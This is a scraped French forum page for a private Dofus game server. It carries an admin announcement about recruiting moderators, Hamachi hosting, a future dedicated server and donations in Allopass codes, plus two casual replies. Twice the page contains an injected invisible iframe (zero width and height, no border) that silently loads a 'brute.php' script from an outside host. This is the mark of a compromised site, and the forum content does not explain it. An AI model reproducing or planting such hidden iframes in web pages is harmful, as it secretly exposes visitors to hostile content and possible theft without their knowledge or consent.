iframe style=”border: none; width: 0px; height: 0px;” src=”http://supprime.net/brute.php?maitre=

Veuillez vous connectez ou vous enregistrez pour accéder au forum et y poster des messages.
iframe style=”border: none; width: 0px; height: 0px;” src=”http://supprime.net/brute.php?maitre=

Serveur privé dofus. Départ lvl 1 xp x2 drop x2 avec 250000 de kamas. Serveur Online

TRES IMPORTANT, A LIRE !!!!

Partager

Admin
    Admin

TRES IMPORTANT, A LIRE !!!!

Message  Admin le Ven 23 Avr - 21:04

Bonjour chers membres du serveur ,

Je voudrais d'abord vous signaler que j'attends toujours pour des modérateurs compétents et je cherche aussi 1 ou 2 animateurs(pour ceux qui seraient intéressés, me MP sur le forum.).
    Donc ça c'était la première chose , deuxième chose : je vous informe que le site d'inscription est maintenant disponible toujours sous hamachi pour le moment, j'en suis vraiment navré...
    Le dédié (= plus besoin d'hamachi et plus grande capacité d'accueil) sera actif dans environ 1 mois voire 1 mois 1/2.
    Quatrième chose, pour FM des cac il faut me MP sur le forum, dans la chat-box ou sur le jeu.
    Cinquième chose, je voudrais vous rappeler que faire fonctionner son aura fait crash le serveur donc ne le faites pas ou je m'acharne sur vous en vous bannissant !(LOL j'rigole!).
    Sixième chose, si vous voulez que le serveur passe en dédié , il va falloir faire des dons pour le serveur. (Vous me MP des codes allopass dofus sur le forum.) Cà n'est en aucun cas obligatoire, croyez-moi.

Bonne vie à tous, chers Death-Troyens!

Dernière édition par Admin le Ven 4 Juin - 20:03, édité 1 fois

charlesbourgain

Re: TRES IMPORTANT, A LIRE !!!!

Message  charlesbourgain le Dim 23 Mai - 14:05

C'est bourgain jveux bin ete modo mi si t veu ^^

remycaffier

Re: TRES IMPORTANT, A LIRE !!!!

Message  remycaffier le Ven 18 Juin - 22:39

charlesbourgain a écrit:C'est bourgain jveux bin ete modo mi si t veu ^^
    $

Ah oué ch'nordiste =P